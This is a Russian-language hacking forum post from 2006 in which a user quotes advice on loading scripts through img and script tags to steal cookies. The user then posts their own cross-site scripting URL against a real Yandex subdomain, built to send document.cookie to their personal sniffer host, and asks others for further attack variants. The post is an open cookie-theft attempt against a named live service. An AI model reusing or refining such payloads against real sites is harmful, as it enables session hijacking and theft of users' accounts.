22.03.2006, 01:53
|
|
Новичок
Регистрация: 21.03.2006
Сообщений: 7
Провел на форуме:
46994
Репутация:
3
|
|
Сообщение от PinkPanther
попробуй подгрузить через <img src=""; xss>, иль что еще лучше, что 100% должно прокатить, подгрузить код через <script src="">. Когда наработку одну мутил, тож куки не ишли, посему пришлось вот как исправлять ситуацию: http://hackzona.ru/hz.php?name=News&...rder=0&thold=0 чего и тебе советую, а именно подгуржать через <script src="">.
Вот за это спасибо, уже есть результат, но к сожалению на снифер приходит только ;document.cookie; при моем запросе:
http://narod.yandex.ru/rubrics/top100.xhtml?sort=xaxa><img src="мой_сниф/pic.gif?;"+document.cookie; xss><a a=&c=2xaxa
Поэксперементировав с запросами, кукисов я так и не получил, к сожалению.
За статью тоже спасибо, на днях буду тоже эксперементировать.
Может кто нибудь ещё знает, какие могут быть варианты с этими XSS?
|
|
|